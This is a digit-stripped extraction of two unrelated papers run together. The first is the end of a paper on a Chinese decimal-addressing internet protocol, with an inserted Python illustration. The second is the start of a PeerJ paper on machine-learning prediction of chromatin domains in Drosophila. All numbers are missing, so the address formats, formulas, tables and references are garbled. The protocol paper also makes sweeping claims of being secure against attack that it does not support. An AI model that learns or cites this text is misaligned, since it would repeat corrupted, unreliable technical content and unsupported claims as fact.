the number of segments of the all-zero field). 
for example, the above address can be abbreviated as: [ [ ][ [ another example: [ [ [ [ [ [ [ ,can be abbreviated as [ ] [ [ [ [ [ [ [ ,can be abbreviated as [ ] ) type of ipv address there are five types of ipv addresses, which are described below. a) full ipv address the full ipv address is the form: y[y[y[y[y[y[y[y, where y represents a decimal integer from to = . b) ipv address compatible with ipv the form of this address is: y[y[y[y[y[y[y[d.d.d.d, where y represents a decimal integer from to = . d represents a decimal integer between and in the ipv . c) ipv address compatible with ipv the form of this address is: y[y[y[y[x:x:x:x:x:x:x:x, where y represents a decimal integer from to = . x represents a hexadecimal number from to ffff in the ipv . d) special compatible address in order to upgrade from ipv and ipv to ipv smoothly, some compatible addresses are designed in this paper. among them, some of the ipv addresses are compatible addresses designed to be compatible with ipv addresses. in order to transition these addresses to ipv addresses smoothly, special treatment has been done in this paper: add the appropriate prefix before this part of the address. in order to make their representations more intuitive and avoid errors caused by negligence in writing, a shorthand approach was introduced: y[y[y[y[x:x:x:x:x:x:d.d.d.d where, each y represents an address of bits and is expressed in decimal. each x represents a -bit ipv address, expressed in hexadecimal. each d represents an -bit ipv address, expressed in decimal. for example: international journal of advanced network, monitoring and controls volume , no. , [ [ [ [ [ [ [ it can be written into: [ [ [ [e : b: : f d:d : : . . . or:[ ]e : b: : f d:d : : . . . for another example: [ [ [ [ [ [ [ it can be written as: :: . . . . "::" is a representation of the compressed form in an ipv address, and a single contiguous sequence of multiple blocks is represented by a double colon symbol "::". the decimal number is expressed in dotted decimal notation as . . . . e) full decimal address in order to facilitate the application of the logistics code and the full decimal address, it is recommended to use the category number , in the th power of , according to the application, it is necessary to adopt a fixed length non-positioning method. f) full decimal address ipv is compatible with the internet of ipv and ipv technology protocols, but ipv and ipv technology protocols cannot be backward compatible with ipv . the concept of compatibility is parallel coexistence, which is a gradual and modest transfer of applications and data services, rather than directly replacing or replacing existing protocols. in order to solve the problem of transition from ipv to ipv smoothly, up to now, a lot of money has been invested in the internet, and the transition address of ipv has been specially designed. a segment of the address is taken from the ipv address space, and about are allocated to allocate ipv . a small number of changes can be made on the current system to achieve the above objectives, in which ipv has a section of j.j.j.j., each j represents a decimal number, from to , that is ~ . among them, the previous [ ] can be omitted in the middle of the local address, that is, the local user (or designated user) can be directly used by j.j.j.j., and is distinguished from the ipv d.d.d.d. 
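The bracket-decimal notation of Section II.B can be illustrated with a short Python sketch. This is only an illustration under our assumptions: it treats an address as a 256-bit integer split into eight 32-bit segments written in decimal and separated by "[", and it compresses the longest run of all-zero segments into "[n]". The exact compression syntax and the worked examples in the text could not be fully recovered, so the function and the sample address below are hypothetical.

```python
def to_bracket_decimal(addr_int, compress=True):
    """Render a 256-bit address as eight 32-bit decimal segments separated by '['.
    Optionally replace the longest run of all-zero segments with '[n]', where n is
    the number of zero segments (assumed reading of the rule quoted above)."""
    assert 0 <= addr_int < 2 ** 256
    segments = [(addr_int >> (32 * (7 - i))) & 0xFFFFFFFF for i in range(8)]

    if compress:
        best_start, best_len, run_start, run_len = -1, 0, -1, 0
        for i, s in enumerate(segments + [None]):      # sentinel closes the final run
            if s == 0:
                if run_len == 0:
                    run_start = i
                run_len += 1
                if run_len > best_len:
                    best_start, best_len = run_start, run_len
            else:
                run_len = 0
        if best_len > 1:
            head = "[".join(str(s) for s in segments[:best_start])
            tail = "[".join(str(s) for s in segments[best_start + best_len:])
            return head + "[" + str(best_len) + "]" + tail
    return "[".join(str(s) for s in segments)

# Hypothetical example: segments [86, 0, 0, 0, 21, 0, 0, 5] -> "86[3]21[0[0[5"
print(to_bracket_decimal((86 << 224) | (21 << 96) | 5))
```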
in order to transition to full decimal smoothly, you can assign decimals to these users at the same time, so that you don't have to re-address when you improve software and hardware in the future. for example, [ ] can be written as [ ] . . . . in a local domain ip network, you can write with . . . directly, so that the original terminal can be used. in order for the original user to be compatible with the current user, there should be a new record in the ipv dns record. any system that uses a transitional ipv address can use the original ipv system with appropriate modifications. at the same time, the header uses the ipv header, but the version number is , to distinguish the original ipv . however, the user terminal in the local domain can use the original terminal device.  when the category number is , the address length is bits, and the physical address of ipv will be discarded, and the -bit address of the ipv host will be used. the representation method is in decimal or - . - in dotted decimal notation, which is the same as hexadecimal ff.ff;  when the category number is , the address length is bits, indicating that the method is decimal - , and the corresponding character length or dotted decimal - . - . - . - , and hexadecimal ff.ff. ff.ff has the same effect;  when the category number is , the address length is bits, indicating that the method is decimal or the corresponding character length;  when the category number is , the address length is bits, indicating that the method is decimal or the corresponding character length.  when the category number is , the address international journal of advanced network, monitoring and controls volume , no. , length is bits, indicating that the method is decimal or the corresponding character length.  when the category number is , the address length is bits, indicating that the method is decimal or the corresponding character length.  when the category number is , the address length is bits, indicating that the method is decimal or the corresponding character length.  when the category number is , the address length has no fixed length, indicating that the method is a decimal length or a corresponding character length. c. braces decimal this method represents a -bit address divided into four -bit decimal numbers and the braces separating them. this method first divides the -bit address into four -bit decimal numbers and the braces separating them, and then represents them. the form of the representation is "z}z}z}z". each z represents the address as a -bit portion and is represented in decimal. it is used in exactly the same way as y, and is compatible with y, and can be mixed. this greatly facilitates the compatibility of these ipv addresses in ipv . for example: z}z}z}z; z}z}y]y]y]y; z}z}y]y]y]d.d.d.d; z}z}z}y]d.d.d.d; z}z}z}y]j.j.j.j; especially the last address format is most useful. for example: the address } } } ] . . . it can be expressed like this: { } ] . . . finally, it should be noted that the use of square brackets and braces in the symbolic representation is not affected. that is, no distinction between "{" and "}", "[" and "]". this definition is taken in view of the fact that this does not cause any side effects and is more user-friendly. d. text representation of the address prefix the scheme of ipv address is similar to the schemes of ipv super net and cidr (classless addressing), which use an address prefix to represent the network hierarchy. 
on the representation of the ipv address prefix, a representation similar to cidr is used, which has the following form: ipv address / address prefix length the address of ipv is an address written by the ipv address notation. the length of the address prefix is the length of consecutive bits indicating the address prefix from the left in the address. it must be noted that the decimal number is used in the ipv address, but the prefix length refers to the binary. therefore, you must calculate the prefix carefully. however, it is not intuitive in binary numbers. after analysis, it is easier to understand that the ipv address prefix is converted to hexadecimal. however, the ipv address is still a decimal number. for example: the address prefix of bits is [ [ [ [ [ [ , which can also be expressed as: [ [ [ [ [ [ [ / or [ ] [ [ [ / or [ [ [ [ [ [ ]/ or [ ] [ [ ]/ it should be noted that in the representation of the address prefix, the representation of the ipv address portion must be legal, that is, the ipv address to the left of the slash "/" must be restored to the correct address. international journal of advanced network, monitoring and controls volume , no. , in this address prefix, you can see that the length of the address prefix is . therefore, the prefix is actually the first segments of the entire address plus the first bits of the seventh segment ( × + = ). so the seventh segment of the address is the most critical. this paragraph is expressed in hexadecimal as: ********. since a hexadecimal digit is equal to bits, the prefix only includes the first two *. knowing this, you can know that the value of this paragraph is included in (hex) ~ ffffff (hex), which can also be expressed in decimal as ~ . alternatively, this paragraph is expressed in binary as: **** **** **** **** **** **** **** ****. because in the binary, one bit occupies bit, the prefix includes the first *, and the range of the value of this segment is ~ , which can also be expressed in decimal as ~ . the ipv address can be generated by padding to the right of the address prefix, which can also be a real ipv address containing the address prefix. for example, the address prefix in the above example can also be expressed as: [ ] [ [a[b/ where, a is an arbitrary decimal number in the range of ~ , and b is an arbitrary decimal number in the range of ~ . iii. features of ipv the intellectual property of decimal network/digital domain names, including copyrights such as《overall allocation method for allocating computer addresses with all-decimal algorithms for networked computers》 (licensed in china in ), 《ipv /future network root domain name server》 and 《chn national top level domain server》. in addition, it also includes the chinese patent license "method for allocating addresses to computers using internet with full digital code" (obtained in ). these constitute the independent innovation of the complete system of ipv , including the address space of the decimal network, root name servers, national and regional top-level domain servers. in accordance with the universal postal rules, which are jointly participated by sovereign states under the un framework. the ipv network communication rules, which are protected by chinese laws and protected by us laws and protected by multinational laws, clearly belong to the public network communication system that is jointly observed by the international community. 
any country that respects china's intellectual property rights and the rights of its owners in accordance with the law can use china's ipv decimal network/digital domain name network communication rules to build an autonomous and controllable network communication system. at the iso/iec future network international conference, mr. xie jianping announced that china's ipv is the common wealth of all mankind and won warm applause from the participants. he won the unanimous vote of the members of the united states, russia, canada and other countries. the conclusions of china's ipv 's independent innovation ideas and practice verification have been written into the iso/iec, "name and addressing" and "security" in the "representation and requirements for future network problems" officially released in . china's ipv has significant features which are described below. ) china's ipv can be compatible with ipv and ipv , and solves the problem of high cost and repeated investment construction caused by ipv not being compatible with ipv . in addition, ipv provides a reliable way for applications (users and services) to transition securely, quickly and smoothly to the ipv system platform. at the same time, the system is still safe and effective in the face of any cyber attacks that may occur at any time. international journal of advanced network, monitoring and controls volume , no. , ) china fully controls all the hardware and software of china's ipv system, including the allocation, management and resolution services of all root domain names including the parent root domain, the primary root domain, the child root domain and the dependent root domain. other countries can't get involved in the illegal control of ipv . it is impossible theoretically to implement network monitoring, modify the system communication routing table, and close the network address switch arbitrarily. moreover, it is difficult to achieve from a technical point of view. the ipv designed in the paper can enable countries to achieve autonomous control of the root domain name server, which has geographical locations. ipv can realize end-to-end direct communication services, can independently build, develop and manage the technical system of domestic cyberspace, and allow countries to cooperate equally and jointly manage the global root domain name resolution system. it is possible to guide and establish a new pattern of the global sovereignty community of destiny. under the guarantee of the new technical system of ipv , the realization of future network interconnection, intercommunication, co-management and co-governance between countries has been presented to the sovereign countries of the united nations. ) china's ipv can determine the level of security, the safety factor, and the power distribution and means of security control. it is fundamentally "not subject to others." ipv treats rfid code as an ip address and allows access to the internet directly, and ensures that it can be exchanged and resolved autonomously in the nearest place in the country. ipv can effectively prevent data from being "forwarded" by the "routing" information of the internet, avoiding data being forwarded globally by the exchange command of the internet, and avoiding data being monitored and copied by the internet network image. it can save a lot of energy and overhead, so ipv is both environmentally friendly and safe. 
any user who applies for and is allowed to own the unique domain name and address of china ipv can enter the ipv network system of china and enjoy the service at the same time, and is protected by the real “real name” of the system. if there is any misconduct or unforeseen circumstances, you can always trace the traces, trace the certification, and lock the evidence so that the "black hand" has nowhere to hide and escape. ) china's ipv start address is bit, and can manage bit address. it can be compressed and recycled on both sides. it can be fixed and not positioned like a telephone system to reduce and save unnecessary overhead costs, increase efficiency. it fully meets the needs of political, business, production, learning, and research users in the field of network science for a long period of time. therefore, it can fully meet the needs of the political, business, production, learning and research users of the future network in the scientific field for a long time. because of this, the computer's networking scale can be set as needed, and can be widely used in space communications, nano computers, human cells or dna computer systems. ipv not only goes far beyond the ietf's vision in rfc , rfc , but also has great advantages compared to ipv . ipv has a bit address, but it can only be unilaterally compressed, not recyclable, and the address is fixed and positioned, the overhead is large, the efficiency is impaired, and the actual address allocation rate is only . - . %. ) china's ipv has the basic conditions that must be met by the future network as determined by the iso/iec international organization for standardization. that is: the basic technical characteristics of the sovereign network; the design flaws and technical disadvantages of the existing networks, including the internet; and the network is obviously superior to the existing network in terms of controllability, credibility, security and reliability. international journal of advanced network, monitoring and controls volume , no. , due to the urgent need for network sovereignty, security and response to emergencies, on the basis of ipv , ipv internet, private network, and local area network, the paper proposes that we should boldly try and build ipv network with lower investment. after a period of time, users, applications and services on the existing network can be smoothly migrated to china's ipv system, which fundamentally forms the basic protection against attack and anti-virus, and establishes a solid foundation for the transition to a future independent and reliable network. iv. conclusion the key technologies of the new generation (ipv ) internet were introduced in this paper. the text representation of the ipv address includes expressions such as "parenthesis" notation, the "bracket" decimal representation and the "braces" decimal representation. the technology is compatible with ipv and ipv , and provides a reliable way to transit to the ipv system platform securely and quickly and smoothly based on ipv and ipv . acknowledgment pre-research project of th five-year equipment development( ). the industrial research project of science and technology department of shaanxi province(grant no. ktzdgy - ) reference [ ] mou chengjin. accelerate the construction of china's independent and controllable system of network security [j]. world socialism studies, , ( ): - + . [ ] he jinsong, peng zhichao, he wenhua, jiang xuejun. comparative study of ipv , ipv and ipv [j].software engineering, , ( ): - . [ ] zhu lin. 
design and implementation intelligent theater based on ipv and nb-iot [d]. beijing university of posts and communications, . [ ] zhang zheqing. experiment and application research super wifi with ipv [d]. beijing university of posts and communications, . [ ] ding songbo, chen jinying, he kai. research on the application and development prospect of ipv [j]. communication & information technology, ( ): - + . [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm[p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group.internet protocol, version (ipv )-specification, rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] xie jianping, xudongmei, etc. digital domain name specification.sj/t - , . . [ ] information technology-future network-problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] information technology-future network-problem statement and requirement-part : security, iso/iec dtr - , , . submitted august accepted september published november corresponding authors michal b. rozenwald, mbrozenvald@edu.hse.ru, michal.rozenwald@gmail.com mikhail s. gelfand, m.gelfand@skoltech.ru, michal.rozenwald@gmail.com academic editor alexander bolshoy additional information and declarations can be found on page doi . /peerj-cs. copyright rozenwald et al. distributed under creative commons cc-by . open access a machine learning framework for the prediction of chromatin folding in drosophila using epigenetic features michal b. rozenwald , aleksandra a. galitsyna , grigory v. sapunov , , ekaterina e. khrameeva and mikhail s. gelfand , faculty of computer science, national research university higher school of economics, moscow, russia skolkovo institute of science and technology, moscow, russia intento, inc., berkeley, ca, usa a.a. kharkevich institute for information transmission problems, ras, moscow, russia abstract technological advances have lead to the creation of large epigenetic datasets, including information about dna binding proteins and dna spatial structure. hi-c experiments have revealed that chromosomes are subdivided into sets of self-interacting domains called topologically associating domains (tads). tads are involved in the regulation of gene expression activity, but the mechanisms of their formation are not yet fully understood. here, we focus on machine learning methods to characterize dna folding patterns in drosophila based on chromatin marks across three cell lines. we present linear regression models with four types of regularization, gradient boosting, and recurrent neural networks (rnn) as tools to study chromatin folding characteristics associated with tads given epigenetic chromatin immunoprecipitation data. the bidirectional long short-term memory rnn architecture produced the best prediction scores and identified biologically relevant features. distribution of protein chriz (chromator) and histone modification h k me were selected as the most informative features for the prediction of tads characteristics. this approach may be adapted to any similar biological dataset of chromatin features across various cell lines and species. 
the code for the implemented pipeline, hi-chip-ml, is publicly available: https://github.com/michalrozenwald/hi-chip-ml subjects bioinformatics, computational biology, molecular biology, data mining and machine learning, data science keywords topologically associating domains (tads), recurrent neural networks (rnn), hi-c experiments, linear regression, gradient boosting, chromatin, dna folding patterns, machine learning introduction machine learning has proved to be an essential tool for studies in the molecular biology of the eukaryotic cell, in particular, the process of gene regulation (eraslan et al., ; zeng, wang & jiang, ). gene regulation of higher eukaryotes is orchestrated by two primary interconnected mechanisms, the binding of regulatory factors to the promoters and enhancers, and the changes in dna spatial folding. the resulting binding patterns and chromatin structure represent the epigenetic state of the cells. they can be assayed how to cite this article rozenwald mb, galitsyna aa, sapunov gv, khrameeva ee, gelfand ms. . a machine learning framework for the prediction of chromatin folding in drosophila using epigenetic features. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:mbrozenvald@edu.hse.ru mailto:michal.rozenwald@gmail.com mailto:m.gelfand@skoltech.ru mailto:michal.rozenwald@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/michalrozenwald/hi-chip-ml http://doi.org/ . /peerj-cs. by high-throughput techniques, such as chromatin immunoprecipitation (ren et al., ; johnson et al., ) and hi-c (lieberman-aiden et al., ). the epigenetic state is tightly connected with inheritance and disease (lupiáñez, spielmann & mundlos, ; yuan et al., ; trieu, martinez-fundichely & khurana, ). for instance, disruption of chromosomal topology in humans affects gliomagenesis and limb malformations (krijger & de laat, ). however, the details of underlying processes are yet to be understood. the study of hi-c maps of genomic interactions revealed the structural and regulatory units of eukaryotic genome, topologically associating domains, or tads. tads represent self-interacting regions of dna with well-defined boundaries that insulate the tad from interactions with adjacent regions (lieberman-aiden et al., ; dixon et al., ; rao et al., ). in mammals, the boundaries of tads are defined by the binding of insulator protein ctcf (rao et al., ). however, drosophila ctcf homolog is not essential for the formation of tad boundaries (wang et al., ). contribution of ctcf to the boundaries was detected in neuronal cells, but not in embryonic cells of drosophila (chathoth & zabet, ). at the same time, up to eight different insulator proteins have been proposed to contribute to the formation of tads boundaries (ramírez et al., ). ulianov et al. ( ) demonstrated that active transcription plays a key role in the drosophila chromosome partitioning into tads. active chromatin marks are preferably found at tad borders, while repressive histone modifications are depleted within inter- tads. thus, histone modifications instead of insulator binding factors might be the main tad-forming factors in this organism. to determine factors responsible for the tad boundary formation in drosophila, ulianov et al. ( ) utilized machine learning techniques. 
for that, they formulated a classification task and used a logistic regression model. the model input was a set of chip-chip signals for a genomic region, and the output, a binary value indicating whether the region was located at the boundary or within a tad. similarly, ramírez et al. ( ) demonstrated the effectiveness of the lasso regression and gradient boosting for the same task. however, this approach has two substantial limitations. first, the prediction of tad state as a categorical output depends on the tad calling procedure. it requires setting a threshold for the tad boundary definition and it is insensitive to sub-threshold boundaries. alternatively, the tad status of a region may be derived from a hi-c map either by calculation of local characteristics of tads such as insulation score (crane et al., ), d-score (stadhouders et al., ), directionality index (dixon et al., ), or by dynamic programming methods, such as armatus (filippova et al., ). methods assessing local characteristics of tads result in assigning a continuous score to genomic bins along the chromosome. dynamic programming methods are typically not anchored to a local genomic region and consider hi-c maps of whole chromosomes. the calculation of transitional gamma has the advantages of both approaches (ulianov et al., ). it runs dynamic programming for whole-chromosome data for multiple parameters and assesses the score for each genomic region. the second limitation is that regression and gradient boosting in ulianov et al. ( ) and ramírez et al. ( ) account for the features of a given region of the genome, but rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ignore the adjacent regions. such contextual information might be crucial for the tad status in drosophila. for a possible solution, one may look at instructive examples of other chromatin architecture problems, such as improvement of hi-c data resolution (gong et al., ; schwessinger et al., ; li & dai, ), inference of chromatin structure (cristescu et al., ; trieu, martinez-fundichely & khurana, ), prediction of genomic regions interactions (whalen, truty & pollard, ; zeng, wu & jiang, ; li, wong & jiang, ; fudenberg, kelley & pollard, ; singh et al., ; jing et al., ; gan, li & jiang, ; belokopytova et al., ), and, finally, tad boundaries prediction in mammalian cells (gan et al., ; martens et al., ). the machine learning approaches used in these works include generalized linear models (ibn-salem & andrade-navarro, ), random forest (bkhetan & plewczynski, ; gan et al., ), other ensemble models (whalen, truty & pollard, ), and neural networks: multi-layer perceptron (gan et al., ), dense neural networks (zeng, wu & jiang, ; farré et al., ; li, wong & jiang, ), convolutional neural networks (schreiber et al., ), generative adversarial networks (liu, lv & jiang, ), and recurrent neural networks (cristescu et al., ; singh et al., ; gan, li & jiang, ). among these methods, recurrent neural networks (rnns) provide a comprehensive architecture for analyzing sequential data (graves, jaitly & mohamed, ), due to the temporal modeling capabilities. a popular implementation of rnn long short-term memory (lstm) models (hochreiter & schmidhuber, ) creates informative statistics that provide solutions for complex long-time-lag tasks (graves, ). thus, the application of ltsm rnns to problems with sequential ordering of a target, such as dna bins characteristics, is a promising approach. 
moreover, this feature is particularly relevant for the tad boundary prediction in drosophila, where the histone modifications of extended genomic regions govern the formation of boundaries (ulianov et al., ). here, we analyze the epigenetic factors contributing to the tad status of the genomic regions of drosophila. as opposed to previous approaches, we incorporate information about the region context on two levels. first, we utilize the context-aware tad characteristic transitional gamma. second, we use the advanced method of recurrent neural network that preserves the information about features of adjacent regions. materials and methods data hi-c datasets for three cultured drosophila melanogaster cell lines were taken from ulianov et al. ( ). cell lines schneider- (s ) and kc from late embryos and dmbg -c (bg ) from the central nervous system of third-instar larvae were analysed. the drosophila genome (dm assembly) was binned at the -kb resolution resulting in sequential genomic regions of equal size. each bin was described by the start coordinate on the chromosome and by the signal from a set of chip-chip experiments. the chip-chip data were obtained from the modencode database (waterston et al., ) and processed as in ulianov et al. ( ). rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as chromatin architecture is known to be correlated with epigenetic characteristics in drosophila (ulianov et al., ; hug et al., ; ramírez et al., ), we selected two sets of epigenetic marks, i.e., transcription factors (tf), and insulator protein binding sites, and histone modifications (hm), for further analysis. the first set included five features (chriz, ctcf, su(hw), h k me , h k ac), which had been reported as relevant for tad formation in previous studies (ulianov et al., ). the second set contained eighteen epigenetic marks in total, extending the first set with thirteen potentially relevant features chosen based on the literature (rna polymerase ii, beaf- , gaf, cp , h k me , h k me , h k me , h k me , h k me , h k me , h k me , h k me , h k ac). to normalize the input data, we subtracted the mean from each value and then scaled it to the unit variance using the preprocessing scale function of the sklearn python library (pedregosa et al., ). we standardized each feature independently; the mean and variance were calculated per each feature (chromatin mark) separately across all input objects (bins), see fig. s . for the full list of chromatin factors and their modencode ids, see table s . target value tads are calculated based on hi-c interactions matrix. as a result of tad calling algorithm, tads are represented as a segmentation of the genome into discrete regions. however, resulting segmentation typically depends on tad calling parameters. in particular, widely used tad segmentation software armatus (filippova et al., ) annotates tads for a user-defined scaling parameter gamma. gamma determines the average size and the number of tads produced by armatus on a given hi-c map. following ulianov et al. ( ), we avoided the problem of selection of a single set of parameters for tads annotation and calculated the local characteristic of tad formation of the genome, namely, transitional gamma. the calculation of transitional gamma includes the tad calling for a wide range of reasonable parameters gamma and selection of characteristic gamma for each genomic locus. this procedure is briefly described below. 
when the parameter gamma is fixed, armatus annotates each genomic bin as a part of a tad, an inter-tad, or a tad boundary. the higher the gamma value used in armatus, the smaller the tads are on average. we perform the tad calling with armatus for a set of parameters and characterize each bin by the transitional gamma at which this bin switches from being a part of a tad to being a part of an inter-tad or a tad boundary. we illustrate the tad annotation and the calculation of transitional gamma in figs. a– c. whole-genome hi-c maps of drosophila cells were collected from ulianov et al. ( ) and processed using armatus with gamma ranging from to with a step of . . we then calculated the transitional gamma for each bin. the resulting distribution of values can be found in fig. d. we note that the value corresponds to the bins that form tad regions that we have never observed as being a tad boundary or inter-tad. these bins might switch from tads with a further increase of gamma; however, they represent a minor fraction of the genome corresponding to strong inner-tad bins.

figure (a–c) example of annotation of a chromosome r region by transitional gamma. for a given hi-c matrix of schneider- cells (a), tad segmentations (b) are calculated by armatus for a set of gamma values (from to , a step of . ). each line in b represents a single tad. then transitional gamma (c) is calculated for each genomic region as the minimal value of gamma where the region becomes inter-tad or a tad boundary. the blue line in c represents the transitional gamma value for each genomic bin. the plots (b) and (c) are limited by gamma for better visualization, although they are continued to the value of . the asterisk (*) denotes the region with transitional gamma of . , the minimal value of gamma where the corresponding region transitions from tad to inter-tad. (d) the histogram of the target value transitional gamma for the schneider- cell line. note the peak at .

problem statement
to avoid ambiguity, we formally state our machine learning problem:
• objects are genomic bins of -kb length that do not intersect,
• input features are the measurements of chromatin factors' binding,
• target value is the transitional gamma, which characterizes the tad status of the region and, thus, the dna folding,
• objective is to predict the value of transitional gamma and to identify which of the chromatin features are most significant in predicting the tad state.

selection of loss function
the target, transitional gamma, is a continuous variable ranging from to , which yields a regression problem (yan & su, ). the classical optimization function for regression is the mean square error (mse), instead of precision, recall, or accuracy as for binary variables. however, the distribution of the target in our problem is significantly unbalanced (see fig. d) because the target value of most of the objects lies in the interval between and . thus, the contribution of the error on objects with a high true target value may also be high in the total score when using mse. we note that the biological nature of genomic bins with high transitional gamma is different from other bins: transitional gamma equal to means that the bin never transformed from being a part of a tad to an inter-tad or a tad boundary. to solve this contradiction, we introduced a custom loss function called the modified weighted mean square error (wmse). it can be formulated as the mse multiplied by a weight (penalty) of the error that depends on the true value of the target variable:

$$\mathrm{wmse} = \frac{1}{N} \sum_{i=1}^{N} \left(ytrue_i - ypred_i\right)^2 \, \frac{\alpha - ytrue_i}{\alpha},$$

where $N$ is the number of data points, $ytrue_i$ is the true value for data point $i$, and $ypred_i$ is the predicted value for data point $i$. here, $\alpha$ is the maximum value of $ytrue$ increased by one, to avoid multiplying the error by zero. the maximum value of the transitional gamma in our dataset is , thus in our case α equals . with wmse as a loss function, the model is penalized less for errors on objects with high values of transitional gamma.

machine learning models
to explore the relationships between the d chromatin structure and epigenetic data, we built linear regression (lr) models, gradient boosting (gb) regressors, and recurrent neural networks (rnn). the lr models were additionally applied with either l or l regularization and with both penalties. for benchmarking, we used a constant prediction set to the mean value of the training dataset. due to the linear connectivity of dna, our input bins are sequentially ordered in the genome. neighboring dna regions frequently bear similar epigenetic marks and chromatin properties (kharchenko et al., ); thus, the target variable values are expected to be vastly correlated. to use this biological property, we applied rnn models. in addition, the information content of the double-stranded dna molecule is equivalent when read in the forward and reverse directions. in order to utilize the dna linearity together with the equivalence of both directions on dna, we selected the bidirectional long short-term memory (bilstm) rnn architecture (schuster & paliwal, ). the model takes a set of epigenetic properties for bins as input and outputs the target value of the middle bin. the middle bin is the object from the input set with index i, where i equals the floor division of the input set length by two. thus, the transitional gamma of the middle bin is predicted using the features of the surrounding bins as well. the scheme of this model is presented in fig. . we exploited the following parameters of the bilstm rnn in our experiments. the sequence length of the rnn input objects is a set of consecutive dna bins of fixed length that was varied from to (window size). the numbers of lstm units that we tested were , , , , , , , , . the weighted mean square error loss function was chosen, and the models were trained with the stochastic optimizer adam (kingma & ba, ). early stopping was used to automatically identify the optimal number of training epochs. the dataset was randomly split into three groups: train dataset %, test dataset %, and % of the data for validation. to explore the importance of each feature from the input space, we trained the rnns using only one of the epigenetic features as input. additionally, we built models in which columns from the feature matrix were one by one replaced with zeros, and all other features

figure scheme of the implemented bidirectional lstm recurrent neural network with one output.
the values of {x ,..,xt} are the dna bins with input window size t, {h ,..,ht} are the hidden states of the rnn model, yt/ represents the corresponding target value transitional gamma of the middle bin xt/ . note that each bin xi is characterized by a vector of chromatin marks chip-chip data. full-size doi: . /peerjcs. /fig- were used for training. further, we calculated the evaluation metrics and checked if they were significantly different from the results obtained while using the complete set of data. results chromatin marks are reliable predictors of the tad state first, we assessed whether the tad state could be predicted from the set of chromatin marks for a single cell line (schneider- in this section). the classical machine learning quality metrics on cross-validation averaged over ten rounds of training demonstrate strong quality of prediction compared to the constant prediction (see table ). high evaluation scores prove that the selected chromatin marks represent a set of reliable predictors for the tad state of drosophila genomic region. thus, the selected set of chromatin marks can be used for chromatin folding patterns prediction in drosophila. the quality metric adapted for our particular machine learning problem, wmse, demonstrates the same level of improvement of predictions for different models (see table ). therefore, we conclude that wmse can be used for downstream assessment of the quality of the predictions of our models. these results allow us to perform the parameter selection for linear regression (lr) and gradient boosting (gb) and select the optimal values based on the wmse metric. for lr, we selected alpha of . for both l and l regularizations. gradient boosting outperforms linear regression with different types of regularization on our task. thus, the tad state of the cell is likely to be more complicated than a linear combination of chromatin marks bound in the genomic locus. we used a wide range of variable parameters such as the number of estimators, learning rate, maximum depth of the individual regression estimators. the best results were observed while setting the rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table evaluation of classical machine learning scores for all models, based on -features and - features inputs. model type mse mse mae mae r train test train test constant prediction . . . . using features: lr + l . . . . . lr + l . . . . . lr + l + l . . . . . gb- . . . . . bilstm rnn . . . . . using features: lr + l . . . . . lr + l . . . . . lr + l + l . . . . . gb- . . . . . bilstm rnn . . . . . table weighted mse of all models, based on -features and -features inputs. features features train test train test constant prediction . . . . linear regression . . . . linear regression + l . . . . linear regression + l . . . . linear regression + l + l . . . . grad boosting estimators . . . . grad boosting estimators . . . . bilstm units & bins . . . . ‘n_estimators’: , ‘max_depth’: and n_estimators’: , ‘max_depth’: , both with ‘learning_rate’: . . the scores are presented in tables and . the context-aware prediction of tad state is the most reliable the alternative model that we studied was bilstm neural network, which provides explicit accounting for linearly ordered bins in the dna molecule. we have investigated the hyperparameters set for bilstm and assessed the wmse on various input window sizes and numbers of lstm units. as we demonstrate in fig. 
, the optimal sequence length is equal to the input window size and lstm units. this result has a potential biological interpretation as the typical size of tads in drosophila, being around kb at -kb resolution hi-c maps which equals to bins. the incorporation of sequential dependency improved the prediction significantly, as demonstrated by the best quality scores achieved by the bilstm (table ). the selected rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure selection of the bilstm parameters. weighted mse scores for the train and test datasets are presented. (a) results of rnn with units for different sizes of sequence length. the sequence size corresponds to the input window size of the rnn or number of bins used together as an input sequence for the neural network. (b) results of rnn with an input sequence of six bins for the different number of lstm units. the box highlights the best scores. the bilstm with six input bins and lstm units was used throughout this study if not specified otherwise. full-size doi: . /peerjcs. /fig- bilstm with the best hyperparameters set performed two times better than the constant prediction and outscored all trained lr and gb models, see tables and . we note that the proposed bilstm model does not take into account the target value of the neighboring regions, both while training and predicting. our model uses the input values (chromatin marks) solely for the whole window and target values for the central bin in the window for training and assessment of validation results. thus, we conclude that bilstm was able to capture and utilize the sequential relationship of the input objects in terms of the physical distance in the dna. reduced set of chromatin marks is sufficient for a reliable prediction of the tad state in drosophila next, we used an opportunity to analyse feature importance and select the set of factors most relevant for chromatin folding. for an initial analysis, we selected a subset of five chromatin marks that we considered important based on the literature (two histone marks and three potential insulator proteins, -features model). the -features model performed slightly worse than the initial -features model (see tables and ). the difference in quality scores is rather small, supporting the selection of these five features as biologically relevant for tad state prediction. we note that the small impact of shrinking of the number of predictors might indicate the high correlation between chromatin features. this is in line with the concept of chromatin states when several histone modifications and other chromatin factors are responsible for a single function of dna region, such as gene expression (filion et al., ; kharchenko et al., ). feature importance analysis reveals factors relevant for chromatin folding into tads in drosophila we have evaluated the weight coefficients of the linear regression because the large weights strongly influence the model prediction. chromatin marks prioritization of -features lr rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure weighted mse using one feature for each input bin in the bilstm 